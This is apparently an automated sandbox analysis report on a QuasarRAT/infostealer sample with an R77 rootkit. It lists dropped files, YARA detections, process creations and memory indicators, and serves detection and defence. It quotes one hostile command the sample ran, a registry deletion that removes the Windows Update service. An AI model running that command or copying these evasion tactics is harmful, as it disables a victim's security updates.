Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B88DCE0	10_2_1B88DCE0
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B898178	10_2_00007FFD9B898178
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B898FE8	10_2_00007FFD9B898FE8
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B898FA8	10_2_00007FFD9B898FA8
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B8A000F	10_2_00007FFD9B8A000F
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B898FC8	10_2_00007FFD9B898FC8
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C741F2C	22_2_000001C25C741F2C
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C74D0E0	22_2_000001C25C74D0E0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C7538A8	22_2_000001C25C7538A8
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C772B2C	22_2_000001C25C772B2C
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C77DCE0	22_2_000001C25C77DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C7844A8	22_2_000001C25C7844A8
Source: C:\Windows\System32\dialer.exe	Code function: 51_2_000000014000226C	51_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 51_2_00000001400014D8	51_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 51_2_0000000140002560	51_2_0000000140002560
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5981F2C	63_2_0000017CD5981F2C
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD59938A8	63_2_0000017CD59938A8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD598D0E0	63_2_0000017CD598D0E0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AC2B2C	63_2_0000017CD5AC2B2C
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AD44A8	63_2_0000017CD5AD44A8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5ACDCE0	63_2_0000017CD5ACDCE0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AF07E0	63_2_0000017CD5AF07E0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AFC7F8	63_2_0000017CD5AFC7F8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AFCA04	63_2_0000017CD5AFCA04
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AF1670	63_2_0000017CD5AF1670
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B00918	63_2_0000017CD5B00918
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B02958	63_2_0000017CD5B02958
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B2D3F8	63_2_0000017CD5B2D3F8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B213E0	63_2_0000017CD5B213E0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B2D604	63_2_0000017CD5B2D604
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B22270	63_2_0000017CD5B22270
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B31518	63_2_0000017CD5B31518
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B33558	63_2_0000017CD5B33558
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B51F2C	63_2_0000017CD5B51F2C
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B638A8	63_2_0000017CD5B638A8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B5D0E0	63_2_0000017CD5B5D0E0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B82B2C	63_2_0000017CD5B82B2C
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B944A8	63_2_0000017CD5B944A8
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B8DCE0	63_2_0000017CD5B8DCE0
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07EFD0E0	66_2_0000023E07EFD0E0
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F038A8	66_2_0000023E07F038A8
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07EF1F2C	66_2_0000023E07EF1F2C
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F4DCE0	66_2_0000023E07F4DCE0
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F544A8	66_2_0000023E07F544A8
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F42B2C	66_2_0000023E07F42B2C
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F71670	66_2_0000023E07F71670
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F7CA04	66_2_0000023E07F7CA04
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F82958	66_2_0000023E07F82958
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F80918	66_2_0000023E07F80918
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F7C7F8	66_2_0000023E07F7C7F8
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F707E0	66_2_0000023E07F707E0
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645CE38A8	68_2_000001A645CE38A8
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645CDD0E0	68_2_000001A645CDD0E0
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645CD1F2C	68_2_000001A645CD1F2C
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EEDCE0	68_2_000001A645EEDCE0
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EF44A8	68_2_000001A645EF44A8
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EE2B2C	68_2_000001A645EE2B2C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\FA9.tmp 22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Code function: String function: 00007FF6880C1394 appears 34 times
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: String function: 00007FF62DC41394 appears 34 times
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: String function: 00007FF650252240 appears 59 times
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: String function: 00007FF650251000 appears 107 times

Source: FA9.tmp.2.dr

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Source: Bara.exe.2.dr	Static PE information: Number of sections : 11 > 10
Source: GR55Qg1hth.exe.0.dr	Static PE information: Number of sections : 11 > 10

Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameClient.exe. vs 5fr5gthkjdg71.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b reference_sample = cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c, os = windows, severity = x86, creation_date = 2022-03-04, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Rootkit.R77, fingerprint = 2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa, id = 5bab748b-8576-4967-9b50-a3778db1dd71, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@124/27@0/1

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731C7B6E8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF731C7B6E8

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

51_2_000000014000226C

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

51_2_00000001400019C4

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731C985A4 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF731C985A4

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

File created: C:\Program Files\Cuis

Jump to behavior

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4351390

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Mutant created: \Sessions\1\BaseNamedObjects\HeBnAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\c3557859-56ac-475e-b44d-e1b60c20d0d0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

File created: C:\Users\user\AppData\Local\Temp\FA9.tmp

Jump to behavior

Source: 5fr5gthkjdg71.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5fr5gthkjdg71.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5fr5gthkjdg71.exe	Virustotal: Detection: 76%
Source: 5fr5gthkjdg71.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

File read: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5fr5gthkjdg71.exe "C:\Users\user\Desktop\5fr5gthkjdg71.exe"
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe"
